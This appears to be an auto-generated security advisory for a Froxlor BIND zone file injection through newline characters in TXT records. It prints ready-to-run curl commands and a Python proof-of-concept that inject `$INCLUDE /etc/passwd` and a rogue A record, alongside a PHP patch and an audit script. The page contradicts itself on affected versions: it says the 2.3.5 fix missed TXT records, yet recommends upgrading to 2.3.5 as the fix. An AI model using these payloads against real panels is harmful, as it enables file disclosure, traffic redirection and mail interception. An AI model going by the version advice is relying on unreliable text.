Froxlor, BIND Zone File Injection via Unsanitized TXT Record (CVE-2026-41234) (Critical) -DC-Jun2026-186


The `DomainZones.add` API endpoint fails to sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, breaking out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives (`$INCLUDE`, `$GENERATE`) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron.

This vulnerability is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but missed patching TXT records. The affected code is in `lib/Froxlor/Api/Commands/DomainZones.php`, lines 306-308, where the `Dns::encloseTXTContent()` function only adds or removes surrounding quote characters without stripping newlines, carriage returns, or any BIND zone metacharacters. The content flows to the zone file via `DnsEntry::__toString()`, which concatenates `$this->content` directly into the zone line followed by `PHP_EOL`. Embedded newlines in the content produce additional lines in the zone file output. The v2.3.5 fix for CVE-2026-30932 added validation functions for LOC, RP, SSHFP, and TLSA types but left TXT records vulnerable.

The vulnerability allows a remote user to inject arbitrary DNS records, disclose sensitive information, and cause a denial of service. The issue exists due to improper neutralization of special elements in output used by a downstream component in the `DomainZones.add` API endpoint and BIND zone file generation when processing unsanitized DNS record content for TXT records. The vulnerability is present in Froxlor versions prior to 2.3.5.

DailyCVE Form:

Platform: Froxlor
Version: ≤2.3.4
Vulnerability: DNS Zone
Severity: Critical
date: 2026-03-24

Prediction: 2026-03-24

What Undercode Say:

The following analytics and code snippets demonstrate the vulnerability and its exploitation:

```bash
# Inject $INCLUDE directive to read /etc/passwd
curl -s -u "API_KEY:API_SECRET" \
  -H 'Content-Type: application/json' \
  -d '{
    "command": "DomainZones.add",
    "params": {
      "domainname": "testdomain.lab",
      "type": "TXT",
      "record": "@",
      "content": "v=spf1 +all\"\n$INCLUDE /etc/passwd",
      "ttl": 18000
    }
  }' \
  https://panel.example.com/api.php

# Inject arbitrary A record
curl -s -u "API_KEY:API_SECRET" \
  -H 'Content-Type: application/json' \
  -d '{
    "command": "DomainZones.add",
    "params": {
      "domainname": "testdomain.lab",
      "type": "TXT",
      "record": "_spf",
      "content": "v=spf1 +all\"\nevil\t18000\tIN\tA\t6.6.6.6",
      "ttl": 18000
    }
  }' \
  https://panel.example.com/api.php
```

```python
#!/usr/bin/env python3
"""Froxlor <= 2.3.4 TXT Zone Injection (CVE-2026-41234)"""
import json, sys, requests, urllib3
urllib3.disable_warnings()


def api(target, key, secret, cmd, params=None):
    # POST one API command to the panel and return the decoded JSON response
    return requests.post(f"{target.rstrip('/')}/api.php",
                         auth=(key, secret), json={"command": cmd, "params": params or {}},
                         verify=False).json()


# Positional arguments: panel URL, API key, API secret, domain
target, key, secret, domain = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]
r = api(target, key, secret, "DomainZones.add", {
    "domainname": domain, "type": "TXT", "record": "@",
    "content": 'v=spf1 +all"\n$INCLUDE /etc/passwd', "ttl": 18000})
# The response lists the zone lines; an echoed directive means the newline was accepted
for line in r.get("data", []):
    if "$INCLUDE" in str(line):
        print(f"Vulnerable: {line}")
```

Exploit:

An authenticated customer with DNS editing enabled can exploit the unsanitized TXT record content by injecting newline characters, breaking out of the record line in the generated BIND zone file. This allows injection of arbitrary BIND directives, such as $INCLUDE /etc/passwd, leading to information disclosure. Additionally, injection of arbitrary DNS records like A, MX, or CNAME can redirect subdomains to attacker-controlled IPs, intercept email, or cause DNS service disruption. The exploit can be performed via the API or the web UI by intercepting and modifying the `dns_content` parameter in a POST request.

Protection:

Upgrade to Froxlor version 2.3.5 or later. If immediate upgrade is not possible, manually patch the code in `lib/Froxlor/Api/Commands/DomainZones.php` to strip newlines and BIND metacharacters from TXT content. Example fix:

```php
} elseif ($type == 'TXT' && !empty($content)) {
    $content = str_replace(["\n", "\r", "\t"], '', $content);
    $content = Dns::encloseTXTContent($content);
}
```
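Until the upgrade is in place, stored records and already-written zone files can be audited for the condition described above: one record rendering as more than one zone line. The following Python check is an added example, not Froxlor code; the record layout in `render()` and the sample rows are constructed for illustration, and it assumes panel-generated zones contain no `$INCLUDE` or `$GENERATE` lines of their own.

```python
import re

# Directives the advisory names as injectable (assumed absent from legitimate panel output).
DIRECTIVE_RE = re.compile(r"^\s*\$(INCLUDE|GENERATE)\b", re.IGNORECASE)
LINE_BREAKS = ("\n", "\r")


def render(rec):
    """Simplified stand-in for the record-to-line concatenation (hypothetical layout)."""
    return f"{rec['record']}\t{rec['ttl']}\tIN\t{rec['type']}\t{rec['content']}\n"


def audit_records(records):
    """Flag stored records whose content would render as more than one zone line."""
    findings = []
    for rec in records:
        if any(ch in rec["content"] for ch in LINE_BREAKS):
            extra = render(rec).splitlines()[1:]
            findings.append({"id": rec["id"], "type": rec["type"], "extra_lines": extra})
    return findings


def audit_zone_text(zone_text):
    """Flag $INCLUDE/$GENERATE lines in an already-written zone file."""
    return [(n, line) for n, line in enumerate(zone_text.splitlines(), 1)
            if DIRECTIVE_RE.match(line)]


# Constructed sample rows; ids are illustrative, content values are the ones shown on this page.
SAMPLE_RECORDS = [
    {"id": 1, "record": "@", "ttl": 18000, "type": "TXT", "content": '"v=spf1 mx -all"'},
    {"id": 2, "record": "@", "ttl": 18000, "type": "TXT",
     "content": 'v=spf1 +all"\n$INCLUDE /etc/passwd'},
    {"id": 3, "record": "_spf", "ttl": 18000, "type": "TXT",
     "content": 'v=spf1 +all"\nevil\t18000\tIN\tA\t6.6.6.6'},
]

if __name__ == "__main__":
    for finding in audit_records(SAMPLE_RECORDS):
        print("record", finding["id"], "adds lines:", finding["extra_lines"])
    zone = "".join(render(r) for r in SAMPLE_RECORDS)
    for line_no, line in audit_zone_text(zone):
        print("zone line", line_no, "is a directive:", line)
```

The record-level audit catches both sample cases, while the zone-text scan only sees the directive: an injected A record is syntactically an ordinary zone line, so it has to be found at the stored-record level.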

Impact:

  • Information Disclosure: `$INCLUDE` directive can read arbitrary world-readable files (e.g., /etc/passwd), exposing sensitive data.
  • DNS Record Injection: Injection of A, MX, CNAME records can redirect traffic, intercept email, or enable subdomain takeover.
  • DNS Service Disruption: Malformed zone content can cause BIND to reject the zone, leading to DNS outages; `$GENERATE` directives can amplify the attack.

Sources:

Reported By: github.com